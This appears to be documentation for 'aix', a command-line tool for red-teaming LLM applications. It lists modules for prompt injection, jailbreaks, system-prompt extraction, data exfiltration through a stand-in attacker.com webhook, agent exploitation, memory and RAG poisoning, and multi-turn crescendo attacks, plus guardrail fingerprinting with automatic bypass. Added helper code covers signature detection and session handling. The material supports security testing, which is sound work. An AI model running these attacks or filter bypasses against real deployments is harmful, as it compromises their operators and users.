# Modules

Every module shares the same common options. Module-specific options are listed per section.

## recon

Reconnaissance and fingerprinting. Runs 8 detection steps in sequence: API structure, authentication, input filters, rate limits, model fingerprinting, behavior analysis, context detection, and guardrail fingerprinting.

```bash
aix recon https://api.target.com/chat -k sk-xxx
aix recon -r request.txt -p "messages[0].content"
aix recon https://api.target.com/chat -k sk-xxx -o profile.json
```

Guardrail detection (step 8) identifies which safety provider is deployed:
| Provider | Detection method |
|---|---|
| OpenAI Moderation API | `flagged`, `category_scores` JSON fields |
| Azure Content Safety | HTTP 400 + `ResponsibleAIPolicyViolation`, `apim-request-id` header |
| AWS Bedrock Guardrails | `INTERVENED`, `guardrailAction` fields + `amazon-bedrock-guardrailaction` header |
| Llama Guard | `[UNSAFE]` / `unsafe\nS<category>` response prefix |
| Lakera Guard | `x-lakera-guard` response headers |
| Perspective API | `attributeScores`, `TOXICITY` fields |
| NeMo Guardrails | `colang`, `rails.*blocked` patterns |
| Custom filter | Refusal patterns when no known signature matches |

Output includes: provider, confidence %, sensitivity profile per content category, and known bypass weaknesses. Results are stored in the session DB automatically.
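As an added example (not code from the aix project), the signature table above expressed as a classifier that a defender can run over captured responses from their own deployment to see whether recon step 8 would identify the provider from signature leakage; the confidence scheme (share of a provider's checks that match) and the sample responses in the usage are constructed assumptions.

```python
import re

# Signature checks per provider, taken from the table above. Each check is a
# predicate over (status, lowercased headers, body). Confidence = share of a
# provider's checks that hit; that scoring is an assumption of this example.
def _hdr(name):
    return lambda s, h, b: any(name in k for k in h)

def _body(pattern):
    return lambda s, h, b: re.search(pattern, b, re.M) is not None

def _status_body(code, pattern):
    # "HTTP 400 + ResponsibleAIPolicyViolation" is one conjunctive signal
    return lambda s, h, b: s == code and re.search(pattern, b) is not None

SIGNATURES = {
    "OpenAI Moderation API": [_body(r'"flagged"'), _body(r'"category_scores"')],
    "Azure Content Safety": [_status_body(400, "ResponsibleAIPolicyViolation"),
                             _hdr("apim-request-id")],
    "AWS Bedrock Guardrails": [_body("INTERVENED"), _body(r'"guardrailAction"'),
                               _hdr("amazon-bedrock-guardrailaction")],
    "Llama Guard": [_body(r"\A\s*(\[UNSAFE\]|unsafe\nS\d+)")],
    "Lakera Guard": [_hdr("x-lakera-guard")],
    "Perspective API": [_body(r'"attributeScores"'), _body('"TOXICITY"')],
    "NeMo Guardrails": [_body("colang"), _body(r"rails\..*blocked")],
}
# Generic refusal wording, consulted only when no vendor signature matched.
REFUSAL = re.compile(r"\b(?:I can(?:'t|not)|I'm unable to|I am unable to) "
                     r"(?:help|assist|comply)", re.I)

def identify_guardrail(status, headers, body):
    """Classify one HTTP response as (provider, confidence_percent)."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    best, best_conf = None, 0
    for provider, checks in SIGNATURES.items():
        hits = sum(check(status, hdrs, body) for check in checks)
        conf = round(100 * hits / len(checks))
        if hits and conf > best_conf:
            best, best_conf = provider, conf
    if best is not None:
        return best, best_conf
    if REFUSAL.search(body):
        return "Custom filter", 50   # refusal seen, but no known signature
    return None, 0
```

A deployment whose error bodies and headers are normalised before they reach the client will come back as `(None, 0)` or a low-confidence "Custom filter", which is the outcome to aim for.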
## fingerprint

Probabilistic LLM identification. Two strategies: embedding-based (high accuracy, requires `aix-framework[ml]`) and pattern-based (default, regex + softmax scoring).

```bash
aix fingerprint https://api.target.com -k sk-xxx
aix fingerprint -r request.txt -p "messages[0].content"
```

## inject

Prompt injection — direct injection, indirect injection, context manipulation, instruction override.

```bash
aix inject https://api.target.com -k sk-xxx
aix inject -r request.txt -p "messages[0].content"
aix inject https://api.target.com -k sk-xxx --evasion aggressive
```

ATLAS: AML.T0048 — OWASP: LLM01
## jailbreak

Safety restriction bypass — DAN variants, character roleplay, developer mode, hypothetical framing.

```bash
aix jailbreak https://api.target.com -k sk-xxx
aix jailbreak -r request.txt -p "messages[0].content"
```

ATLAS: AML.T0051 — OWASP: LLM01
## extract

System prompt extraction — direct extraction, roleplay tricks, translation abuse, repeat/format abuse.

```bash
aix extract https://api.target.com -k sk-xxx
aix extract -r request.txt -p "messages[0].content"
```

ATLAS: AML.T0056 — OWASP: LLM07
## leak

Training data and PII leakage — memorized data, PII in responses, RAG document leakage, architecture info.

```bash
aix leak https://api.target.com -k sk-xxx
aix leak -r request.txt -p "messages[0].content"
```

ATLAS: AML.T0056, AML.T0057 — OWASP: LLM02, LLM06
## exfil

Data exfiltration channels — markdown image injection, link injection, hidden iframes, webhook callbacks.

```bash
aix exfil https://api.target.com -k sk-xxx --webhook https://attacker.com
aix exfil -r request.txt -p "messages[0].content"
```

ATLAS: AML.T0025, AML.T0024 — OWASP: LLM02
## agent

AI agent exploitation — tool abuse, unauthorized actions, privilege escalation, code execution.

```bash
aix agent https://agent.target.com -k sk-xxx
aix agent -r request.txt -p "messages[0].content"
```

ATLAS: AML.T0043, AML.T0048 — OWASP: LLM08
## dos

Denial of service — token exhaustion, rate limit testing, infinite loop prompts, memory exhaustion.

```bash
aix dos https://api.target.com -k sk-xxx
aix dos -r request.txt -p "messages[0].content"
```

ATLAS: AML.T0029 — OWASP: LLM04
## fuzz

Edge cases and malformed input — unicode fuzzing, format string attacks, boundary testing, encoding attacks.

```bash
aix fuzz https://api.target.com -k sk-xxx
aix fuzz -r request.txt -p "messages[0].content" --iterations 500
```

ATLAS: AML.T0043 — OWASP: LLM01
## memory

Context and memory attacks — context window overflow, conversation history poisoning, persistent memory manipulation, context bleeding.

```bash
aix memory https://api.target.com -k sk-xxx
aix memory -r request.txt -p "messages[0].content"
```

ATLAS: AML.T0048 — OWASP: LLM03
## rag

RAG-specific attacks — indirect injection via documents, context poisoning, source manipulation, retrieval bypass, knowledge base extraction.

```bash
aix rag https://api.target.com -k sk-xxx
aix rag -r request.txt -p "messages[0].content"
```

| Category | Risk |
|---|---|
| Indirect Injection | CRITICAL |
| Context Poisoning | CRITICAL |
| Source Manipulation | HIGH |
| Retrieval Bypass | HIGH |
| KB Extraction | MEDIUM |
| Chunk Boundary | MEDIUM |

ATLAS: AML.T0043, AML.T0048 — OWASP: LLM01, LLM02
## multiturn

Multi-turn conversation attacks that bypass single-shot defenses by building context across turns.

```bash
aix multiturn https://api.target.com -k sk-xxx
aix multiturn https://api.target.com -k sk-xxx --category crescendo --level 3
aix multiturn https://api.target.com -k sk-xxx --max-turns 5 --turn-delay 1.0
```

| Category | Description |
|---|---|
| `crescendo` | Gradually escalate from benign to malicious |
| `trust_building` | Establish rapport before payload delivery |
| `context_poisoning` | Define terms early, abuse them later |
| `role_lock` | Deep persona establishment |
| `memory_injection` | Inject false memories |
| `instruction_layering` | Stack partial instructions across turns |
| `cognitive_overload` | Overwhelm before attack |
| `authority_transfer` | Leverage perceived expertise |

Module-specific options:

| Option | Description |
|---|---|
| `--category` | Filter by attack category |
| `--max-turns` | Maximum turns per sequence (default: 10) |
| `--turn-delay` | Delay between turns in seconds (default: 0.5) |
## chain

Execute multi-step YAML attack playbooks. See Attack Chains for full syntax.

```bash
aix chain https://api.target.com -k sk-xxx -P full_compromise
aix chain --list
aix chain --show full_compromise
aix chain --dry-run -P quick_scan
```

## scan

Run all modules sequentially for a full assessment.

```bash
aix scan https://api.target.com -k sk-xxx
aix scan -r request.txt -p "messages[0].content"
```

## Common options

| Option | Short | Description |
|---|---|---|
| `--request` | `-r` | Burp Suite request file |
| `--param` | `-p` | JSON path to injection point (e.g. `messages[0].content`) |
| `--key` | `-k` | API key |
| `--profile` | `-P` | Saved profile name |
| `--verbose` | `-v` | `-v` shows reasons, `-vv` shows debug |
| `--output` | `-o` | Save results to JSON file |
| `--proxy` | | HTTP proxy (host:port) |
| `--cookie` | `-C` | Cookies (key=value; ...) |
| `--headers` | `-H` | Custom headers (key:value; ...) |
| `--format` | `-F` | Body format: json, form, multipart |
| `--level` | | Test depth 1–5 (default: 1) |
| `--risk` | | Risk level 1–3 (default: 1) |
| `--show-response` | | Print AI response for each finding |
| `--verify-attempts` | `-va` | Confirmation attempts before reporting a finding |
| `--no-bypass` | | Disable automatic guardrail bypass |
| `--ai` | | AI provider for eval/context: openai, anthropic, ollama, gemini |
| `--ai-key` | | API key for AI provider |
| `--ai-model` | | Model for AI features |
| `--generate` | `-g` | Generate N context-aware payloads |
| `--no-eval` | | Disable LLM-as-a-Judge evaluation |
| `--no-context` | | Disable AI context gathering |
| `--response-path` | `-rp` | JSON path to extract response (e.g. `choices.0.message.content`) |
| `--response-regex` | `-rr` | Regex to extract content from response |
Session refresh options:

| Option | Description |
|---|---|
| `--refresh-url` | URL to fetch a new session token |
| `--refresh-regex` | Regex to extract token from refresh response |
| `--refresh-param` | Parameter to update with new token |
| `--refresh-error` | String/regex in response that triggers refresh |
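An added illustration of the refresh cycle these four options describe (not code from the aix project): the `transport` callable and the `FakeApi` responses are constructed stand-ins so the example runs offline, and the option names map one-to-one onto the constructor arguments.

```python
import re

class SessionRefresher:
    """Re-acquire a session token when a response says the old one expired.

    refresh_error: regex that marks an expired session (--refresh-error)
    refresh_url:   where to fetch a new token (--refresh-url)
    refresh_regex: regex whose group 1 is the token (--refresh-regex)
    refresh_param: request field to overwrite with it (--refresh-param)
    transport:     assumed callable (url, payload) -> (status, body)
    """
    def __init__(self, transport, refresh_url, refresh_regex, refresh_param, refresh_error):
        self.transport = transport
        self.refresh_url = refresh_url
        self.refresh_regex = re.compile(refresh_regex)
        self.refresh_param = refresh_param
        self.refresh_error = re.compile(refresh_error)
        self.refreshes = 0   # how many times a token had to be re-fetched

    def _refresh(self):
        status, body = self.transport(self.refresh_url, None)
        match = self.refresh_regex.search(body)
        if status != 200 or not match:
            raise RuntimeError("could not obtain a new session token")
        self.refreshes += 1
        return match.group(1)

    def send(self, url, payload):
        """Send once; if refresh_error matches, refresh, patch the payload and resend once."""
        status, body = self.transport(url, payload)
        if self.refresh_error.search(body):
            payload = dict(payload, **{self.refresh_param: self._refresh()})
            status, body = self.transport(url, payload)
        return status, body, payload

class FakeApi:
    """Constructed stand-in for a target API: only token 'tok-2' is accepted."""
    def __call__(self, url, payload):
        if url.endswith("/refresh"):
            return 200, '{"session":"tok-2"}'
        if payload.get("token") != "tok-2":
            return 401, '{"error":"session expired"}'
        return 200, '{"reply":"ok"}'
```

On the server side this cycle is visible as a 401, a hit on the refresh endpoint and an immediate retry of the same request, which is a usable log signature for automated testing traffic.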
Chat ID tracking options:

| Option | Description |
|---|---|
| `--chat-id-path` | Dot-path to extract chat ID from response |
| `--chat-id-param` | Request field to inject the captured chat ID into |
| `--new-chat` | Force new conversation per payload |
| `--reuse-chat` | Reuse same chat ID across all payloads |
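Added example, not the project's own code, of the path handling behind `--param`, `--response-path`, `--response-regex`, `--chat-id-path` and `--chat-id-param`: both the `messages[0].content` and `choices.0.message.content` spellings from the option tables are accepted, and the request template and response body used in the test are constructed samples.

```python
import json
import re

# A path segment is anything between dots or square brackets; numeric
# segments are list indexes, everything else is a dict key.
_SEGMENT = re.compile(r"[^.\[\]]+")

def parse_path(path):
    """'messages[0].content' and 'choices.0.message.content' both become
    ['messages', 0, 'content'] / ['choices', 0, 'message', 'content']."""
    return [int(s) if s.isdigit() else s for s in _SEGMENT.findall(path)]

def get_path(obj, path):
    """Read the value at path (used for --response-path and --chat-id-path)."""
    for key in parse_path(path):
        obj = obj[key]
    return obj

def set_path(obj, path, value):
    """Return a copy of obj with the value at path replaced or added
    (used for --param and --chat-id-param); the template is left untouched."""
    obj = json.loads(json.dumps(obj))
    *parents, last = parse_path(path)
    cur = obj
    for key in parents:
        cur = cur[key]
    cur[last] = value
    return obj

def extract_response(body, response_path=None, response_regex=None):
    """Pull the model text out of a raw body, by regex (group 1 if present)
    when --response-regex is given, otherwise by --response-path."""
    if response_regex:
        m = re.search(response_regex, body, re.S)
        if not m:
            return None
        return m.group(1) if m.groups() else m.group(0)
    return get_path(json.loads(body), response_path)

def next_request(template, param, text, body, chat_id_path, chat_id_param):
    """Build the follow-up request: inject text at --param and carry the chat
    ID read from the previous response into --chat-id-param."""
    req = set_path(template, param, text)
    return set_path(req, chat_id_param, get_path(json.loads(body), chat_id_path))
```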